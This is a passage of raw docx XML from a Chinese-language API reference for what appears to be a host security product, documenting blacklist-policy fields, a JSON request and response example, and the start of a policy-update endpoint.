          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="042BAC57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>源IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68BCDF49" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DA3CD78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="300E2659" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29E1EF30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BA1C985" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="04AA8279" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30CEE9E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>switchStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CF042D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78404E73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="560E7BA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开关状态，0：关闭，1：打开</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C5C1667" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IpRange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4780CEA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3D43AF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FE715DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F3E639F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="194C9C82" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33841111" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C8F8873" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5972845C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开始</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3A92A53A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B1CEDF6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>endIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FE1BBD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61EF761A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>结束</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26D97D7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AFC89B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strategyName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "新建黑名单-20220606164812",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"ports": ["7788"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"protos": ["TCP"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "7788",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>switchStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstTagIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["all"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstGroupIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [9],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstRealmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcTagIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["629d90ceba7f06736d40f5a5", "629d90c6ba7f06736d40f5a4"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcGroupIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [2],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcRealmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AF8B84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53884369" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8EED49"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B6089E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F31D0B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1520524C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1401FD56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="75F20619" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="319775EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A93ED7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="380A15C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E5D3F6E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60E0DD9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DA3165F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="649E0CC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="397D5EB9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A573294" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E3C4CE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A5E29FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19A79F33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E"/>
    <w:p w14:paraId="4E931FA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="447" w:name="_Toc115166296"/>
      <w:bookmarkStart w:id="448" w:name="修改策略"/>
      <w:bookmarkEnd w:id="446"/>
      <w:r>
        <w:t>修改策略</w:t>
      </w:r>
      <w:bookmarkEnd w:id="447"/>
    </w:p>
    <w:p w14:paraId="7D31FF03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021122E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/black-strategy/update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6673F744"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563"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="5666"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D1AB0A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9E1CA45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36196606" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="076BCD6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DB46886" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="315E3782" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23F8A814" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1554C8D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70A94461" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28B13580" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="70918AE3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06843F10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>strategyName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A73EB35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C13120A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32A7F5E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F3E780B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A8A1CDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstRealmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F81B0BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D65F875" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BF98A60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问者范围，1:业务组、标签，2:自定义主机，3：自定义</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5CAF362B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A8FF885" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstGroups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="503DB479" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A415B99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6863EE05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="646F2972" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48BDEF3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstTags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="398F7B95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5084D21A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="127D1A85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
